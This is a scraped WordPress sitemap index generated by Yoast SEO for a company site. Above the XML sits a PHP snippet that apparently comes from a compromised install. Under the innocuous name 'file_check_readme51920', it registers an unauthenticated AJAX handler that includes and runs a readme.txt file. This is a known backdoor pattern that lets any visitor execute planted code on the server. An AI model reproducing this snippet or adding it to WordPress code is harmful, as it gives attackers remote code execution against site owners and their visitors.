if(!function_exists('file_check_readme51920')){
   add_action('wp_ajax_nopriv_file_check_readme51920', 'file_check_readme51920');
   add_action('wp_ajax_file_check_readme51920', 'file_check_readme51920');
   function file_check_readme51920()
   {
      $file = __DIR__ . '/' . 'readme.txt';
       if (file_exists($file)) {
           include $file;
       }
       die();
   }
}
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.datrys-tech.com.au/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.datrys-tech.com.au/page-sitemap.xml</loc>
		<lastmod>2025-02-05T10:55:09+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->